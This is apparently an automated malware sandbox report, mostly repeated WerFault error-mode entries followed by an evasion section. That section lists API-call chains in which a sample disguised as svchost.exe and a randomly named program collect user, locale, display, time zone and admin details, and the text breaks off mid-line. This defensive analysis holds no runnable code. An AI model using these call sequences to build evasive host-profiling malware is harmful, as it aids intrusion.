    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFil
e,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 2_2_02BB4B00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,
LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_008D4B00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00884B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,
LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_00884B00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,Set